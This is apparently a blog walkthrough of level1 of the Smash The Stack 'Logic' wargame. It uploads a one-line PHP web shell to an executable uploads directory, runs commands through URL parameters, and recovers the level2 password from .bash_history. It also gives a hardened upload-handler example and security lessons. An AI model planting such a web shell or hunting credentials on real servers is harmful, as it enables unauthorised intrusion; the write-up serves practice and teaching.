Welcome back to Technolution! Today we’re going to be starting the Logic wargame, hosted on the Smash The Stack network. As always, passwords will be stripped and replaced with Y’s. So without further ado, let’s get started.
Starting Logic, we should visit its main page. This page links us to level1, which is running as a website hosted on the wargame server. This website takes a file and uploads it to a directory called “uploads”. Since the uploads directory sounds like it’s within the http directory, let’s make the assumption that we can execute php files in there, since the upload page is itself a php file. Thus, let’s create a php file which, when we visit it, will let us execute commands on the webserver. Let’s use the following today:
<?php
// Runs the value of the "h" GET parameter as a shell command and prints its output
echo system($_GET["h"]);
?>
Before discussing this file, I’d like to take a moment to discuss the choice of using a php file with a system() call. There are many options one could take when allowed to upload a file, however, I feel this is the most reliable. We know we’re running on a web server, that php is enabled, and that web traffic is allowed through any firewall rules. This makes php with system() call access via HTTP a strong vector of attack. Another option would be to upload a binary of something such as netcat, or try and call netcat, ssh, or various other programs through your uploaded file. While this is an option, there may be things (such as firewall rules, already bound ports, etc) which may make these vectors less reliable. Thus, in this example, we’ll continue on with our simple php system() call file.
As stated, this file simply takes a parameter called “h” via the URL-supplied GET parameters and sends it as a command to the system() call function. It then prints the output of the command. Go ahead and save that as a php file and upload it onto the webserver. Then, go to the uploads directory and access the file you just uploaded (we’ll be using s9.php as our filename in this example). To test it, let’s check the current directory with the print working directory command (pwd). To do this, visit the page and pass this command as the value for the “h” parameter:
http://logic.smashthestack.org:8181/uploads/s9.php?h=pwd
/srv/www/level1/uploads /srv/www/level1/uploads
Great, it works! A couple of things to note: we get an extra repeat of the last line of output, because system() writes the command’s output directly and also returns the last line, which our echo then prints a second time (hence the repeat at the end). Also, there isn’t a line break (since we’re viewing in a web browser, which requires the html <br> tags or similar). To make line breaks show, try viewing the page’s source!
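The reason this works at all is that the level1 upload handler accepts any filename and drops it inside the document root, where the web server happily executes it as PHP. As an added example (not code from the wargame or from this writeup), here is what a hardened upload handler can look like. The form field name “file”, the path /srv/uploads-private and the extension allowlist are assumptions chosen for illustration:

```php
<?php
// Added example of a hardened upload handler; not the wargame's code.
// Assumptions: the form field is named "file", and UPLOAD_DIR is a
// directory OUTSIDE the document root, so nothing stored there is ever
// served or executed by the web server.
declare(strict_types=1);

const UPLOAD_DIR = '/srv/uploads-private';   // assumed path, not under /srv/www
const MAX_BYTES  = 2 * 1024 * 1024;          // 2 MiB size cap

// Allowlist: permitted extension => MIME type that must be detected from the
// file's actual content. Anything not listed (e.g. .php, .phtml) is rejected.
const ALLOWED = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'pdf' => 'application/pdf',
];

// Validates one entry of $_FILES and returns the extension to store it under.
function validate_upload(array $f): string
{
    if (!isset($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($f['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // The client-supplied name is used only to look up the extension;
    // it is never reused on disk.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('file type not allowed');
    }
    // Check the real content type, not the Content-Type header the client sent.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($f['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    return $ext;
}

// Stores a validated upload under a random, server-chosen name and returns it.
function store_upload(array $f): string
{
    $ext  = validate_upload($f);
    // The uploader controls neither the name nor the extension on disk,
    // so a file like "s9.php" can never be created.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!is_uploaded_file($f['tmp_name']) || !move_uploaded_file($f['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // no execute bit, not world-readable
    return $name;
}

if (isset($_FILES['file'])) {
    try {
        $stored = store_upload($_FILES['file']);
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Files kept outside the document root have to be served back through a download script that sets the Content-Type and Content-Disposition headers itself. If an upload directory must live under the webroot for some reason, turn the script engine off for it as defence in depth (with mod_php, `php_admin_flag engine off` in that directory’s configuration), so that even a file that slips past validation is delivered as plain bytes rather than run.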
Next, let’s check what user the web server is running as with the “id” command:
http://logic.smashthestack.org:8181/uploads/s9.php?h=id
uid=601(level1) gid=601(level1) groups=601(level1),615(nosu) uid=601(level1) gid=601(level1) groups=601(level1),615(nosu)
Great, we’re running as level1. Let’s go a head and check out level1’s home directory:
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=ls%20-la%20/home/level1
total 52
drwxr-xr-x 2 level1 level1 4096 Oct 16 2010 .
drwx--x--x 21 root root 4096 Aug 9 2010 ..
-rw-r--r-- 1 root level1 43 Sep 19 2010 .bash_history
-rwxr-x--- 1 root level1 1708 Feb 5 2010 .bash_profile
-r--r--r-- 1 level1 level1 246 Oct 16 2010 README
-rw-r--r-- 1 level1 level1 32304 Oct 13 13:23 tags
-rw-r--r-- 1 level1 level1 32304 Oct 13 13:23 tags
Let’s go and check out the README, see if we can figure out more information about the system:
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=more%20/home/level1/README
::::::::::::::
/home/level1/README
::::::::::::::
Congrats on getting to the shell. Now you must find the password for level2.
Once you have found the password you can reconnect to the server as the
level2 user:ssh -p 2227 logic.smashthestack.org -l level2
You need not look far from home.
You need not look far from home.
Already congratulating us on shell access; well, I guess we kind of have shell access! Hmm, I wonder what this “you need not look far from home” stuff is about. If we get a directory listing of /home/level2 we can find a .pass file; however, we don’t have permission to read it!
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=ls%20-la%20/home/level2
total 24
drwxr-xr-x 2 level2 level2 4096 Apr 26 2010 .
drwx--x--x 21 root root 4096 Aug 9 2010 ..
-rwxr-x--- 1 root level2 1708 Feb 5 2010 .bash_profile
-r-------- 1 level2 level2 9 Apr 26 2010 .pass
-rw-r--r-- 1 level2 level2 7253 Oct 13 14:36 tags
-rw-r--r-- 1 level2 level2 7253 Oct 13 14:36 tags
So, looking back at level1: we haven’t found the password, we haven’t logged into the shell, and we haven’t caused any changes to .bash_history. Let’s look at the contents of the bash history to see what was last done in September of 2010 (two years ago at the time of writing).
view-source:http://logic.smashthestack.org:8181/uploads/s9.php?h=more%20/home/level1/.bash_history
::::::::::::::
/home/level1/.bash_history
::::::::::::::
ls
who
cat README
YYYYYYYY
clear
su level2
su level2
Well, that’s somewhat interesting. Noticing that level2’s .pass is 9 bytes, which with the trailing newline makes for an 8-character password, I wonder if it’s just a coincidence that the string in .bash_history, typed right before someone switched users to level2, is also 8 characters. To check, we can try to ssh in as level2 and use that string as the password:
login as: level2
Problems connecting? Visit us on IRC at irc.smashthestack.org
(port +6697) in channel #logic. Or email mh@smashthestack.org
Level1 is not accessed via SSH. Please find it online at:
http://logic.smashthestack.org:8181/index.html
level2@logic.smashthestack.org’s password:
[level2@logic ~]$
Tada! There we have it, level1 of Logic complete! So, what’s the lesson here? Don’t trust users? Don’t let users upload arbitrary files? Don’t let users upload files to a place where they can be executed? Maybe all of the above. Also, if you happen to reveal important things, such as passwords (a practical example would be mysqldump or other commands that take a password as a plain-text command-line argument), remember that this information is saved in (and should be cleared from) logs such as .bash_history!